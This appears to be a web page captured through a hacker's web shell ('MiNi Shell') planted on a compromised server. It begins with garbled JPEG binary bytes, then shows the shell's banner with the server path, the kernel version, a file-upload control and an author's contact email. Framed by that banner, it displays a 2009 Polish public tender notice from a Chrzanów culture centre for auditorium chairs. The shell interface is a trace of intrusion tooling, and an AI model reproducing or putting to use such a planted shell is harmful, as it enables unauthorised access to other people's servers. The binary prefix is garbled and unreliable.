JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/243356-N-2009.html

<p class="kh_header"><b>Chrzanów: Dostawa krzeseł do sali odczytowej w budynku Domu Kultury przy ul. Broniewskiego 4 w Chrzanowie</b><br>
<b>Numer ogłoszenia: 243356 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Kultury, Sportu i Rekreacji , ul. Broniewskiego 4, 32-500 Chrzanów, woj. małopolskie, tel. 032 6233086, faks 032 6233087.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.moksir.chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa krzeseł do sali odczytowej w budynku Domu Kultury przy ul. Broniewskiego 4 w Chrzanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot   zamówienia  obejmuje:
-  dostawę  i  montaż   krzeseł  audytoryjnych  w  ilości  120   sztuk  z pulpitem i haczykiem na torbę    w ilości   116   sztuk  
- dostawę  12 sztuk paneli frontowych z przesuwnymi pulpitami w tym 9 sztuk przed I rzędem, 3 szt.   przed II rzędem  wykonanych ze sklejki gr. 14 mm, wyposażonych w haczyki oraz  ich montaż  do   podłoża sali
- dostawę  10  szt. krzeseł wolnostojących 
do sali odczytowej  w  budynku  Domu  Kultury  przy  ul. Broniewskiego  4  w  Chrzanowie.
Krzesła audytoryjne muszą być fabrycznie nowe oraz muszą spełniać wszelkie normy wymagane od tego typu mebli, związane z aktualnie obowiązującymi przepisami i normami w zakresie BHP, p.poż., higieniczności, w szczególności posiadać atesty badań wytrzymałościowych w zakresie bezpieczeństwa użytkowania, ogniotrwałości wystawionych przez podmioty uprawnione do kontroli jakości.
Podłoga w sali w której będą montowane krzesła audytoryjne jest  pokryta klepką drewnianą grubości      22 mm klejoną na betonie.
Sposób rozmieszczenia krzeseł w sali odczytowej przedstawia rys. nr 1 stanowiący załącznik do siwz.
Szczegółowy opis przedmiotu zamówienia
I. Krzesła audytoryjne muszą spełniać następujące wymogi:
Krzesło trwale montowane na ramie metalowej, siedzisko i oparcie ergonomiczne ze sklejki bukowej przetłaczanej 3D, z nakładkami tapicerowanymi na siedzisku i oparciu, wyposażone w system cichego zamykania.
1.	Wymiary krzesła:
a)	wysokość całkowita  1225 mm (ze złożoną półką)
b)	głębokość złożonego krzesła  330 mm
c)	szerokość krzesła pojedynczego  600 mm
d)	głębokość siedziska  430 mm
2.	Konstrukcja krzesła:
Rama metalowa z profili stalowych, spawana i lakierowana proszkowo w kolorze RAL   9006. Zaślepki i osłony wykonane z tworzywa sztucznego w kolorze harmonizującym z kolorem ramy.
3.	Siedzisko:
a)	siedzisko ergonomiczne, uchylne, system składania sprężynowy, wykonane ze sklejki bukowej wielowarstwowej o grubości min 12 mm, na ramie wykonanej z rur stalowych, z nakładką tapicerowaną o grubości min 35 mm, na sklejce bukowej, wypełnioną gąbką CM - 24  30 mm, wytapicerowaną tkaniną  posiadającą odporność na ścieranie min 100.000 cykli Martindale, z szytymi boczkami. Kolor tapicerki krzeseł  ciemnopomarańczowy lub rudopomarańczowy. Do oferty należy załączyć wzorniki kolorów tapicerki foteli
b)	siedzisko bezpieczne w użytkowaniu, szczególnie przez osoby o mniejszej sprawności fizycznej, odporne na intensywną eksploatację, czynności konserwacji ograniczone do minimum, czynności regulacji i smarowania wyeliminowane
4.	Oparcie:
Oparcie ergonomiczne, zamocowane do ramy metalowej, wykonane ze sklejki bukowej wielowarstwowej o grubości min 12 mm, z nakładką tapicerowaną o grubości min 35 mm na sklejce bukowej, wypełnioną gąbką CM-24, wytapicerowaną tkaniną posiadającą odporność na ścieranie min 100.000 cykli Martindale, z szytymi boczkami
5.	Pulpit:
Bezpieczny, składany, przesuwny (z możliwością przesunięcia), wykonany ze sklejki grubości 14 mm. Pulpit mocowany do metalowej konstrukcji krzesła. Pulpit bezpieczny w użytkowaniu, pozbawiony elementów zagrażających bezpieczeństwu użytkownika. Niedopuszczalne jest stosowanie mechanizmu nożycowego lub dźwigniowego. Nie dopuszcza się pulpitów wykonanych z płyty wiórowej.
II. Krzesła wolnostojące z oparciem: 
		Kolorystyka obić oraz stelażu krzeseł wolnostojących powinna być zgodna 
z kolorystyką  krzeseł audytoryjnych.


III. Wymagane atesty i badania, które należy dołączyć do oferty:
a)	atest (sprawozdanie) wytrzymałościowy w zakresie bezpieczeństwa użytkowania zgodnie z normą PN-EN 12727:2004, stopień 4
b)	klasyfikacja ogniowa w zakresie zapalności mebli tapicerskich zgodnie z normą PN-EN 1021-1:2006,  PN-EN 1021-2:2006, klasyfikująca produkt jako trudno zapalny wydana przez Instytut Techniki Budowlanej lub równoważne
c)	Atest Higieniczny wydany przez Narodowy Instytut Zdrowia Publicznego - Państwowy Zakład Higieny
d)	Klasyfikacja ogniowa w zakresie wydzielania toksycznych produktów spalania zgodnie z normą PN-B-02855:1988 w zakresie ochrony przeciwpożarowej budynków wydana przez Instytut Techniki Budowlanej lub równoważne..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.11.30.00-7, 39.11.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W tym przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, ubiegających się wspólnie o udzielenie zamówienia.
Jeżeli oferta wykonawców ubiegających się wspólnie o udzielenie zamówienia, zostanie wybrana, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych wykonawców.
5.3. Z postępowania o udzielenie zamówienia wyklucza się:
1) wykonawców, którzy  wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona  prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania
2) wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3) wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4) osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu
lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za
przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6) spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko
obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7) spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione
w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8) osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści
majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10) wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3.
5.4 Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy:
1) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji
2) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
3) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.;
4) nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, jeżeli Zamawiający żąda wniesienia wadium lub nie zgodzili się na przedłużenie okresu związania ofertą.
5.5. Zamawiający zawiadamia równocześnie wykonawców, którzy zostali wykluczeni z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne, z zastrzeżeniem art. 92 ust. 1 pkt. 3 ustawy Pzp.
5.6. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z regułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 6 SIWZ i dołączonych do oferty.
W przypadku  nie  spełnienia warunków udziału w postępowaniu wykonawca zostanie wykluczony z postępowania a jego oferta zostanie odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunku zawartego w pkt. 5.1.1 SIWZ Wykonawca przedłoży:
a) Wypełniony i podpisany przez osoby uprawnione lub upoważnione przez Wykonawcę Formularz oferty sporządzony według załącznika nr 1 do SIWZ
b) Pełnomocnictwo dołączone w formie oryginału lub notarialnie poświadczonej kopii, albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa , jeśli oferta będzie podpisana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, czyli uczestników konsorcjum
c) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;  w przypadku gdy ofertę składa kilka podmiotów występujących wspólnie dotyczy to każdego z nich
W celu potwierdzenia spełnienia warunku zawartego w pkt. 5.1.2 SIWZ Wykonawca przedłoży:
d) Wykaz wykonanych dostaw  w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających  swoim  rodzajem i wartością dostawom stanowiącym  przedmiot zamówienia, z podaniem ich wartości, przedmiotu,  daty i miejsca wykonania oraz odbiorców  wraz z potwierdzeniem, że dostawy zostały wykonane należycie (załącznik nr 2). W przypadku braku potwierdzenia należytego wykonania dostaw na wykazie prosimy o załączenie dokumentów (np. referencji) potwierdzających wymagane informacje.
e) Informacja o osobie, która będzie odpowiedzialna za realizację zamówienia - zał. nr 3. 
W celu potwierdzenia spełnienia warunku zawartego w pkt. 5.1.3 i 5.1.4 SIWZ Wykonawca przedłoży:
f) Oświadczenie Wykonawcy o spełnianiu warunków udziału w niniejszym postępowaniu określonym w SIWZ oraz w art. 22 ustawy Prawo zamówień publicznych jak również nie podleganiu wykluczeniu na podst. art. 24 ustawy (załącznik nr 4) - w przypadku gdy ofertę składa kilka podmiotów występujących wspólnie dotyczy to każdego z nich.
Oprócz dokumentów wymienionych powyżej Wykonawca załącza:
g) Informację o zakresie robót, które Wykonawca zamierza powierzyć do wykonania podwykonawcom - zał. nr 5 (Dokument nie jest wymagany w przypadku, gdy Wykonawca nie przewiduje powierzenia części zamówienia podwykonawcom)
h) Atesty wystawione przez podmioty uprawnione do kontroli jakości na:
a)	atest (sprawozdanie) wytrzymałościowy w zakresie bezpieczeństwa użytkowania zgodnie z normą PN-EN 12727:2004, stopień 4
b)	klasyfikacja ogniowa w zakresie zapalności mebli tapicerskich zgodnie z normą PN-EN 1021-1:2006,  PN-EN 1021-2:2006, klasyfikująca produkt jako trudno zapalny wydana przez Instytut Techniki Budowlanej lub równoważne
c)	Atest Higieniczny wydany przez Narodowy Instytut Zdrowia Publicznego - Państwowy Zakład Higieny
d)	Klasyfikacja ogniowa w zakresie wydzielania toksycznych produktów spalania zgodnie z normą PN-B-02855:1988 w zakresie ochrony przeciwpożarowej budynków wydana przez Instytut Techniki Budowlanej lub równoważne.
i) model proponowanego fotela i krzesła.
6.1. W przypadku gdy wykonawca ma siedzibę lub miejsce zamieszkania za granicą,  w miejsce dokumentu, o których mowa w pkt. 6c, zobowiązany jest przedłożyć dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 2 Rozporządzenia PRM z dn. 19.05.06r. z późn. zm. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawców oraz form w jakich te dokumenty mogą być składane.
Dokumenty sporządzone w języku obcym powinny być składane wraz z tłumaczeniem na język polski,  poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.moksir.chrzanow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOKSiR 
ul. Broniewskiego 4
32-500 Chrzanów.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2009 godzina 10:00, miejsce: MOKSiR Chrzanów, ul. Broniewskiego 4, pok. nr 9.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com